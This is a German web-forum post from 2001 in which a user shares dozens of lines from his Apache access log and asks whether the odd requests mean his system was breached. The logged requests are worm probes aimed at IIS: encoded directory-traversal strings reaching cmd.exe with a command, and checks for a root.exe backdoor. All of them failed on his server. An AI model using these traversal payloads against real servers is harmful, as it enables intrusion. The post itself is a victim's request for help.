xNeTworKx: was haben diese Zugriffe zu bedeuten ?

Beitrag lesen

SELF-Forum

was haben diese Zugriffe zu bedeuten ?

xNeTworKx
Informationen zu den Bewertungsregeln

Hallo,
ich hab mir mal so spaßhalber die Accesslog meines lokalen Apache angesehen und dabei sind mir ein paar, besser gesagt, viele seltsame Zugriffe aufgefallen, die ich mir nicht erklären kann, aber ich glaub, daß es nichts gutes zu bedeuten hat, weil die Pfade gehen anscheinend irgendwo in mein System ? Das is nur ein Auschnitt, es sind mindestens 10 verschiedene IPs insgesamt, die ich hier aber trotzdem nicht posten will. Was hat das Ganze zu bedeuten ? Waren Leute unbefugt in meinem System ?

    • [25/Dec/2001:20:25:40 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:20:25:42 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:20:25:43 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [25/Dec/2001:20:25:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:20:25:47 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:20:25:49 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:20:25:51 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:20:25:52 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:20:25:54 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:20:25:56 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:20:25:58 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:32:43 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [25/Dec/2001:21:32:43 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [25/Dec/2001:21:32:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [25/Dec/2001:21:32:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [25/Dec/2001:21:32:45 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:32:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:21:32:46 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:21:32:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [25/Dec/2001:21:32:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:32:48 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:32:48 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:32:49 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:32:49 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:21:32:50 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:21:32:51 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:32:51 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:50:15 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [25/Dec/2001:21:50:16 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [25/Dec/2001:21:50:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [25/Dec/2001:21:50:19 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [25/Dec/2001:21:50:20 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:50:21 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:21:50:22 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [25/Dec/2001:21:50:23 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [25/Dec/2001:21:50:25 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:50:26 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:50:27 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:50:28 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [25/Dec/2001:21:50:30 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:21:50:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [25/Dec/2001:21:50:32 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [25/Dec/2001:21:50:33 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:10:03:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:10:03:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [26/Dec/2001:10:03:14 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:10:03:18 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:10:03:19 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:10:03:21 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:10:03:43 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:10:03:44 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [26/Dec/2001:10:03:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:10:03:54 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:10:04:07 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:10:10:37 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:10:10:38 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [26/Dec/2001:10:10:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:10:10:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:10:10:49 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:10:10:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:10:10:57 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
      HTTP/1.1" 200 2326
    • [26/Dec/2001:11:31:03 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:11:31:05 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [26/Dec/2001:11:31:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:11:31:15 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:11:31:37 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:11:31:39 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:11:31:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:11:31:45 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [26/Dec/2001:11:31:48 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:11:33:19 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:11:33:24 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:11:33:26 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    • [26/Dec/2001:11:33:32 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [26/Dec/2001:11:33:33 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    • [26/Dec/2001:11:33:34 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:11:33:39 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:13:01:21 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:13:01:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [26/Dec/2001:13:01:23 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:13:01:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:13:01:24 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:13:01:24 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:13:01:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
    • [26/Dec/2001:13:01:29 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
    • [26/Dec/2001:13:07:02 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:13:07:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
    • [26/Dec/2001:13:07:03 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:13:07:03 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    • [26/Dec/2001:13:07:07 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    • [26/Dec/2001:13:20:13 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    • [26/Dec/2001:14:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
Beitrag melden
Informationen zu den Bewertungsregeln
0 32

was haben diese Zugriffe zu bedeuten ?

xNeTworKx
  • webserver
  1. 0
    frank_eee
    1. 0
      Harry
      1. 0
        xNeTworKx
        1. 0
          xNeTworKx
          1. 0
            xNeTworKx
            1. 0
              Sönke Tesch
            2. 0
              W. Pichler
            3. 0
              MIchael Schröpl
        2. 0
          Sönke Tesch
          1. 0
            Christoph Schnauß
            1. 0
              xNeTworKx
              1. 0
                Henryk Plötz
              2. 0
                Christoph Schnauß
                1. 0
                  Henryk Plötz
            2. 0
              Harry
            3. 0
              Sönke Tesch
            4. 0
              Michael Schröpl
        3. 0
          Christoph Schnauß
          1. 0
            Harry
    2. 0

      Unsinn, das ist kein Hinweis auf einen Virus

      Christoph Schnauß
      1. 0

        Doch, ist es ...

        Calocybe
        1. 0
          Christoph Schnauß
          1. 0
            Henryk Plötz
          2. 0
            Calocybe
            1. 0

              Bauanleitung zum Schreiben eines M$-IIS-Virus

              Michael Schröpl
              1. 0
                Calocybe
                1. 0
                  Michael Schröpl
      2. 0
        Harry
      3. 0
        W. Pichler
  2. 0
    Christoph Schnauß
  3. 0
    Carsten